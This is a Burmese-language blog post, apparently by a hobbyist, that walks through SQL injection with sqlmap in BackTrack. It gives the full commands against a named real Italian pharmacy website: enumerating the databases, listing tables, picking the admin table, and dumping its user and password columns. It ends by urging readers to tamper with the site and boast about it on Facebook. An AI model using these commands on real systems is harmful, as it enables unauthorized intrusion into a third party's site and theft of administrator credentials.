ေရႊေတာင္သားေလး: sql injection in backtrack (sqlmap)

sql injection in backtrack (sqlmap)

Posted by Unknown on - -

ပထမဆံုးဒီပို ့စ္ကို ဘယ္ကေန ကူးယူျခင္းမွမဟုတ္ပဲ ကြ်န္ေတာ္ ေမာင္ phoenix ကိုယ္တိုင္စမ္းျပီးမွ screenshoot မ်ားႏွင့္ ကိုယ္တိုင္ေရးသားျခင္းျဖစ္ေၾကာင္း ၾကြား အဲ့ေလ... ေျပာပါရေစခည ဘာလို ့လဲဆို ဒီလို tutorial ေတြက အမ်ားၾကီးပဲမလို ့ ထင္ေယာင္ထင္မွားျဖစ္မွာစိုးလို ့ပါ အိုခီစမယ္ခင္ဗ်
terminal ဖြင့္လိုက္ပါခည ျပီးရင္ cd /pentest/database/sqlmap လို ့ရိုက္လိုက္ပါ ေအာက္ကပံုလိုေပၚလာပါလိမ့္မယ္

ေနာက္တစ္ခု command မေရးပဲသြားလို ့ရပါေသးတယ္ application>backtrack>vulnerability>assessment>web application assessment>web vulnerability scanner>sql map ကိုေရာက္ေအာင္သြားမယ္ဗ်

အိုခီ တူတူပဲ ခုနကပံုလိုပဲေပၚလာမွာပဲ အဟမ္းစေတာ့မယ္ခည

command ေရးပါ့မယ္ python sqlmap.py --url vulsite --dbs

အဲ့ဒီမွာ dbs ဆိုတာက database ေတြဆဲြႏိႈက္ အဲ့... ဆဲြထုတ္မယ္လို ့ေျပာတာပါ သူ ့ဆိုက္မွာရွိသေလာက္

database ေတြကို ဆဲြထုတ္မယ္ေပါ့ဗ်ာ ဒီလိုေရးလို ့လဲရပါတယ္ python sqlmap.py --url vulsite --current-db

အဲ့ေကာင္ကက်ေတာ့ ခုလက္ရွိ ရွိေနတဲ့ database တစ္ခုထဲကိုပဲ သီးသန္ ့ဆဲြထုတ္မယ္ေပါ့

အခု ကြ်န္ေတာ္ရွာထားတဲ့ (အဟမ္း...ၾကြားတာ.. ဒီလိုပဲေလ ကေလးဆိုေတာ့ ဘာမွမဟုတ္လဲ

ၾကြားခ်င္တာ.. ေနာက္တစ္ခု ဟဲ့ကားဆိုရင္ ေစာ္ၾကည္တယ္ဆိုလားပဲ :P ) ထားပါေတာ့ အခု ကြ်န္ေတာ္တို
့ vul ျဖစ္ေနတဲ့ http://www.farmaciaartegna.it/prodotti.php?id=175 ဆိုတဲ့ ဆိုက္ေလးနဲ ့
စမ္းၾကည့္ရေအာင္ အဲ့ဒီေတာ့ ေရးရမယ့္ command က python sqlmap.py --url http://www.farmaciaartegna.it/prodotti.php?id=175 --dbs ေပါ့ အဲ့ဒီမွာ --current-db ထည့္လဲ ျပသနာမရွိပါဘူး အုိခီ ေအာက္ကပံုေလးကို တစ္ခ်က္ၾကည့္လိုက္ပါဦးဗ်

ေပါက္တယ္ဟုတ္... အိုခီ အဲ့လိုဆိုရင္ ဘာေတြေပၚလာမလဲဆိုေတာ့ကာ............database ကိုဆဲြထုတ္တယ္ဆိုမွေတာ့ database ပဲထြက္လာမွာေပါ့ေနာ့္ေလ ေအာက္ကပံုကိုၾကည့္လိုက္ပါဦးဗ် အဲ့... ဘာတဲ့တုန္း available database တဲ့ :D

အိုခီဗ်ာ dbs ရျပီဆိုေတာ့ က်ေနာ္ အဲ့ db ထဲက table ေတြကို ထပ္ျပီး ဆဲြထုတ္မယ္

command က python sqlmap.py --url http://www.farmaciaartegna.it/prodotti.php?id=175 -D artegna_ec --tables ပါ

အဲ့ဒီမွာ -D ဆိုတာ ခုနကရခဲ့တဲ့ database ကို ျပန္ညႊန္းတာပါ သူ ့ထဲက table ေတြကိုဆဲြထုတ္မယ္ေပါ့ဗ်ာ ေအာက္ကပံုမွာၾကည့္လိုက္ပါဦး

အဲ့လိုျပီးရင္ ဘာေတြ ဆက္ေပၚလာမလဲဆိုေတာ့ကာ.......... ဘာေပၚမွာလဲဟင္ table ဆဲြထုတ္မွေတာ့ စားပဲြပဲ လာမွာေပါ့ဗ်ာ ;) ေအာက္ကပံုမွာ ရိႈးလိုက္

ဖလားဖလားဖလားးးးး table ၃၅ ခုေတာင္ က်ေနာ္ အျဖဴေလးနဲ ့ ကြက္ျပထားပါတယ္ table ေတြကိုေတာ့ အစိမ္းေလးနဲ ့ကြက္ျပထားပါတယ္ အဲ့ဒါ အကုန္မဟုတ္ေသးပါဘူး screen ဆန္ ့သေလာက္ေလးျပထားတာ

အုိခီဗ်ာ table ေတြရျပီဆိုေတာ့ က်ေနာ္ အဲ့ table ေတြထဲက column ေတြကိုဆဲြထုတ္မယ္ဗ်ာ ေရးရမယ့္ command က python sqlmap.py --url http://www.farmaciaartegna.it/prodotti.php?id=175 -D artegna_ec --T ec_admin --columns

ခုနကမွတ္မိတယ္မလား --dbs ကို -D ေျပာင္းျပီးေတာ့ database name --tables ေရးခဲ့တာေလ ခုလဲ အဲ့လိုပဲ --tables ကို ျပန္ညႊန္းတဲ့အေနနဲ ့ -T ေရးျပီးေတာ့ table name --columns လို ့ေရးမွာ table name ဆိုတဲ့ေနရာမွာ ဘာေရြးမလဲဆိုေတာ့ ec_admin ဆိုတဲ့ table ကိုပဲေရြးမယ္ဗ်ာ ကိုယ္က site admin ျဖစ္မွ ၾကိဳက္သလို ကလိလို ့ရမွာ၉...........

ေအာက္ကပံုမွာၾကည့္လုိက္ပါဦး

အိုခီီဗ်ာ အဲ့ဒါဆို column ေတြထြက္လာမယ္ေပါ့ေနာ္ ေအာက္ကပံုမွာ ၾကည့္ပါဦးဗ်

အိုခီဗ်ာ အဲ့ဒီ column ထဲက data ေတြကို ဆြဲႏိႈက္ဦးမယ္ခည

ဒီလိုေလးထပ္ေရးမယ္ command က python sqlmap.py --url http://www.farmaciaartegna.it/prodotti.php?id=175 -D artegna_ec -T ec_admin -C abilitato,gruppo,pass,user --dump

ခုနကလိုပဲေနာ္ -C ဆိုတာ column ေတြကို ျပန္ညႊန္းတာ abilitato,gruppo,pass,user ဆိုတာေတြကေတာ့ column ေတြေပါ့ အဲ့ေကာင္ကို --dump ဆိုျပီး ဒန္ ့ အဲ့ေလ dump လိုက္ဗ်ာ

ဘာေတြ ့မလဲဆိုေတာ့ ဟဲ..... သိတယ္မလား ေအာက္ကပံုကိုၾကည့္လိုက္ရင္ သိမွာပါ :D

အဲ့ဗ်ာ....... user | pass တဲ့ ဒခ်ိဒခ်ိ ဘာဆက္လုပ္ရမလဲ သိတယ္မလား :D ေျပာေတာ့ဘူးေနာ္ ကလိခ်င္သလိုကလိ ျပင္ခ်င္သလိုျပင္ ျပီးေတာ့ ဖြဘုတ္တတ္ျပီးၾကြားေပါ့ ခုနက က်ေနာ္ေျပာသလိုပဲ ဟက္ကာဆိုရင္ ေစာ္ၾကည္တယ္ေလ ဟဲဟဲ

Categories: နည္းပညာ